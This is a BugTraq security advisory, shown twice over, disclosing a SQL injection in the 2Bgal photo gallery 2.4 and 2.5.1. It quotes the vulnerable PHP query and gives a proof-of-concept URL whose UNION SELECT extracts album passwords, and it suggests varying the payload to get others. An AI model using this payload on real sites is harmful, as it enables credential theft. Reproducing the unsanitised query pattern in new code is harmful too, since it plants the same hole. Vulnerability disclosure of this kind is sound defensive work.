BugTraq
Back to list
|
Post reply
2Bgal : 2.4 & 2.5.1 SQL injection Vulnerability
Dec 22 2004 07:49AM
zib zib (zibelette aol com)
2Bgal 2.5.1 SQL injection Vulnerability
(http://www.ben3w.com/)
12/22/2004
----------------------------------------------------------------------
Description:
----------------------------------------------------------------------
2Bgal is fully customizable photo gallery.
It's seems to be vulnerable at a SQL injection.
----------------------------------------------------------------------
Vulnerable code (disp_album.php(~53) and maybe disp_img.php)
----------------------------------------------------------------------
$chaine="SELECT nom,idpere FROM ".$tbl_alist." WHERE id=".$id_album;
$request = MYSQL_QUERY($chaine);
$nom_currentalbum = mysql_result($request,0,"nom");
$idpere_currentalbum = mysql_result($request,0,"idpere");
----------------------------------------------------------------------
Proof of concept (2Bgal with MySQL 4.x.x):
----------------------------------------------------------------------
http://www.server.com/2bgal/disp_album.php?id_album=2%20UNION%20SELECT%2
0passwd%20as%20nom,%20idpere%20FROM%20galbumlist%20LIMIT%201; --
This code allows you to get password for the first album.
You can play with SQL injection code to get others passwords.
----------------------------------------------------------------------
Version
----------------------------------------------------------------------
2Bgal 2.5.1
2Bgal 2.4 (seems to be affected too)
others not tested
----------------------------------------------------------------------
Discovered by Romain Le Guen:
http://coding.romainl.com
contact @AT@ romainl.com
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
2Bgal 2.5.1 SQL injection Vulnerability
(http://www.ben3w.com/)
12/22/2004
----------------------------------------------------------------------
Description:
----------------------------------------------------------------------
2Bgal is fully customizable photo gallery.
It's seems to be vulnerable at a SQL injection.
----------------------------------------------------------------------
Vulnerable code (disp_album.php(~53) and maybe disp_img.php)
----------------------------------------------------------------------
$chaine="SELECT nom,idpere FROM ".$tbl_alist." WHERE id=".$id_album;
$request = MYSQL_QUERY($chaine);
$nom_currentalbum = mysql_result($request,0,"nom");
$idpere_currentalbum = mysql_result($request,0,"idpere");
----------------------------------------------------------------------
Proof of concept (2Bgal with MySQL 4.x.x):
----------------------------------------------------------------------
http://www.server.com/2bgal/disp_album.php?id_album=2%20UNION%20SELECT%2
0passwd%20as%20nom,%20idpere%20FROM%20galbumlist%20LIMIT%201; --
This code allows you to get password for the first album.
You can play with SQL injection code to get others passwords.
----------------------------------------------------------------------
Version
----------------------------------------------------------------------
2Bgal 2.5.1
2Bgal 2.4 (seems to be affected too)
others not tested
----------------------------------------------------------------------
Discovered by Romain Le Guen:
http://coding.romainl.com
contact @AT@ romainl.com
[ reply ]